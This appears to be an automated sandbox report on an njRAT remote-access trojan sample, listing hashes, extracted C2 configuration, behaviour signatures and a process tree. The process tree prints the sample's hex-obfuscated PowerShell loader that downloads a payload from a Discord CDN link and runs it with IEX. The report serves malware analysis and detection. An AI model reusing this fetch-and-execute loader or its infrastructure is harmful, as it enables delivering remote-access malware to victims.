Overview

overview

10

Static

static

0992c90342...22.exe

windows7_x64

10

0992c90342...22.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    13-09-2021 17:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe

  • Size

    7KB

  • MD5

    0152ba660d23a2bb6edda5078fc936fa

  • SHA1

    253c14c6dd3e5aaa224b2cb6bfc9a53012896776

  • SHA256

    0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522

  • SHA512

    8c2dbe5d3dce477f24d80b2221bc3ebd48bdc923bb599758e116ef4db05f91c392e484e0f46e072809108d11fc7433481f01b3f7d7a0e184114daad8ee5ab666

Score
10/10
njrathackedtrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg

Extracted

Family

njrat

Version

v2.0

Botnet

HacKed

C2

d3dx-botnet.portmap.host:7276

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
    "C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4560
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -c "$link = 'https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg';$hex = '28 4E 65 77 2D 4F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 53 74 72 69 6E 67 28 22 24 6C 69 6E 6B 22 29 20 7C 20 49 45 58';$hex.Split(' ') | forEach{[char]([convert]::toint16($_,16))} | forEach{$result=$result+$_};$result | iex"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4744
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            #cmd
            5⤵
            • Drops startup file
            • Suspicious use of AdjustPrivilegeToken
            PID:4972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat
    MD5

    53c8f257e3d32009e9e087dd8ed38da9

    SHA1

    ed4f3487930634c56fc02e6d4272eb93a84d7836

    SHA256

    3bb009df04fe062f749515ac36ff348958e8fbfb8897a6d6e0cb34f86e76dd3f

    SHA512

    96c2b00f6c2b876fc0ad47ec68fa414c570c8903924c71d4428fa4878f88d8519a3bcd1c435b480a4959f58ad41802397897dc0ae4cda1a212bf656afe1a9332

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs
    MD5

    232174031b9591e1add2320bf6da9f14

    SHA1

    3f2722464c176abc974441f21fbdeba071d67f5d

    SHA256

    5694b52e005c385d6807e02e45af35cbe39af18bb31325901ac86a633ceb68f7

    SHA512

    d675d843204b6aa7077376588dc6ba493a9c300f0f45403daaddb5c4ec8183dec856de966a3fd43e67423674a1240f294b36baec5defb567a474050baa6c51e5

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\key.bin
    MD5

    138a4669ce7b2e27012c9f4ffc3993fe

    SHA1

    20f6df71b5d0e20e6ffa7474e3f95cb87b5a8fd0

    SHA256

    83a39301950ddd38becff29f6645556fa25b1eea21148a40ae26ecdafc603206

    SHA512

    cae661b658bd171702614162c2da42fa42c72070a806535167a33923b94855f81504ca2e18b6584aba04650a303e29d1eaada86c6e57171a9badd28112a5e09d

    Download Submit
  • memory/4560-115-0x0000000000150000-0x0000000000151000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4636-117-0x0000000000000000-mapping.dmp
    Download
  • memory/4696-120-0x0000000000000000-mapping.dmp
    Download
  • memory/4744-137-0x0000025FB0F46000-0x0000025FB0F48000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-154-0x0000025FB0EC0000-0x0000025FB0ED5000-memory.dmp
    Filesize

    84KB

    Download
  • memory/4744-135-0x0000025FB0F40000-0x0000025FB0F42000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-136-0x0000025FB0F43000-0x0000025FB0F45000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-126-0x0000025F98DE0000-0x0000025F98DE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4744-152-0x0000025FB0EB0000-0x0000025FB0EB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-121-0x0000000000000000-mapping.dmp
    Download
  • memory/4744-130-0x0000025FB1050000-0x0000025FB1051000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4744-158-0x0000025FB0F48000-0x0000025FB0F49000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4972-156-0x000000000040838E-mapping.dmp
    Download
  • memory/4972-155-0x0000000000400000-0x000000000040E000-memory.dmp
    Filesize

    56KB

    Download
  • memory/4972-164-0x0000000008FD0000-0x0000000008FD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4972-165-0x0000000009B00000-0x0000000009B01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4972-166-0x00000000095F0000-0x00000000095F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4972-167-0x0000000009600000-0x0000000009601000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4972-168-0x00000000095C0000-0x00000000095C1000-memory.dmp
    Filesize

    4KB

    Download